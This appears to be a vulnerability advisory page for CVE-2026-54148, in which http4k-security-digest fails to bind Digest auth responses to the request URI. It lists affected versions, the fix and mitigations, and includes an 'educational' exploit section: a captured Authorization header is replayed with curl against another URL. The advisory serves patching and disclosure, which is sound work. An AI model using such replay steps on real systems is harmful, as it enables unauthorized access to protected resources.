http4k, Digest Authentication URI Binding Bypass, CVE-2026-54148 (High) -DC-Aug2026-1588

Listen to this Post

An issue in DigestAuthProvider.verify: the `uri` parameter in the client’s `Authorization: Digest …` response was not checked against the actual request URL. A captured Digest authentication response could be replayed against any other URL served by the same realm, breaking the per-request-URL binding the Digest scheme assumes. Any application using `http4k-security-digest` for HTTP Digest authentication is affected. The bug has been present since `DigestAuthProvider` was introduced (commit 8a52b615b1, 2021). The fix rejects credentials whose `uri` parameter does not match the request URL. For deployments that cannot upgrade immediately, place Digest auth behind a reverse proxy that pins requests to a single URL.

DailyCVE Form:

Platform: http4k-security-digest
Version: <=6.49.0.0 / <=5.41.0.0 / <=4.50.0.0
Vulnerability: Digest URI Binding Bypass
Severity: High
date: 2026-06-16

Prediction: 2026-06-16 (Patch already released)

What Undercode Say:

Check your http4k-security-digest version
./gradlew dependencies | grep http4k-security-digest
Example vulnerable configuration (Kotlin)
val auth = DigestAuthProvider(
realm = "My Realm",
credentials = { ... }
) // No URI validation
Fixed version check (build.gradle.kts)
dependencies {
// Vulnerable
// implementation("org.http4k:http4k-security-digest:6.49.0.0")
// Fixed (Community)
implementation("org.http4k:http4k-security-digest:6.50.0.0")
}

Exploit: (Educational Purposes!)

1. Capture a valid Digest auth response (e.g., via proxy or network sniffing)
Example Authorization header:
Authorization: Digest username="user", realm="My Realm", nonce="abc123",
uri="/api/resource1", response="hash123", ...
2. Replay the same Authorization header against a different URL in same realm
curl -X GET http://target/api/resource2 \
-H 'Authorization: Digest username="user", realm="My Realm", nonce="abc123", \
uri="/api/resource1", response="hash123", ...'
The server accepts it because uri is not validated against /api/resource2

Protection:

  • Upgrade to `http4k-security-digest` 6.50.0.0 (Community), 5.42.0.0 (Enterprise LTS), or 4.51.0.0 (Enterprise LTS)
  • If unable to upgrade, place Digest authentication behind a reverse proxy that pins requests to a single URL
  • Contact [email protected] for Enterprise LTS access

Impact:

  • A captured Digest authentication response can be replayed against any other URL served by the same realm
  • Breaks the per-request-URL binding that the Digest authentication scheme assumes
  • Affects all applications using `http4k-security-digest` for HTTP Digest authentication
  • Present since `DigestAuthProvider` in 2021 (commit 8a52b615b1)

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top